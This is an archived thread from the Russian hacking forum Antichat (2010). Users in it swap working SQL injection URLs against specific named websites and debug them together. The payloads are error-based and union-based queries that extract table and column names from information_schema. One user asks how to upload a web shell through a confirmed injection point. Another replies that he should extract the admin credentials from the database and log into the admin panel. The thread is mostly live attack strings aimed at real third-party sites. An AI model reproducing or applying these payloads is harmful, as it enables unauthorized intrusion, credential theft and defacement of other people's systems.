ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.03.2010, 20:21
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от v1d0qz
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
не получилось
|
|
|
26.03.2010, 00:06
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от v1d0qz
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
Сообщение от LokbatanLi
не получилось
Конечно не получилось, там где where, нужно было развенуть дужки. Ничего не хочет думать молодёжь...
Последний раз редактировалось v1d0qz; 26.03.2010 в 00:10..
|
|
|
|
25.03.2010, 18:32
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Код:
http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj? |
|
|
|
25.03.2010, 18:46
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от CyberHunter
Код:
http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj? нет..
Код:
http://diktatu.net/index.php?id=-1+union+select+1,2,%28select+concat%280x7e,0x27,group_concat%28table_name%29,0x27,0x7e%29+from+information_schema.tables+Where+table_schema=0x64696B74617430305F64696B74617475%29--
|
|
|
|
25.03.2010, 18:49
|
|
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
Провел на форуме:
312907
Репутация:
18
|
|
На UcoZе есть XSS?
|
|
|
|
25.03.2010, 21:12
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.zed.ua/en/index.php?id=(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x75615f6d656e755f6974656d+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2+limit+0,1)a)
Последний раз редактировалось Pashkela; 25.03.2010 в 21:32..
|
|
|
|
25.03.2010, 22:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Ctacok:
Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
|
|
|
|
25.03.2010, 22:22
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Pashkela
2 Ctacok:
Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
Хоть ты мне и писал как-то давно что не обязательно, но уж от привычки сложно отказаться, да и рука сама тянеться, и не всегда кстате срабатывает без +--+, ну ты понел.
|
|
|
|
25.03.2010, 23:02
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
Вопрос состоит в том, как залить шелл?
Вот есть у меня скуля:
http://www.shokoladka.ru/info.php?id=-177%27+union+select+1,2,3,4,5,6,7,8,9+--+
.
Напишите как можно залить сюда шелл.
И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается  |
|
|
|
25.03.2010, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от CyberHunter
Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
Вопрос состоит в том, как залить шелл?
Вот есть у меня скуля:
.
Напишите как можно залить сюда шелл.
И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается покажи как делал.
достаешь из базы пасс и логин от админки - заходишь и там смотришь по обстоятельствам.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2011663){kind=avatar}
Похожие темы
Комбинированный вид
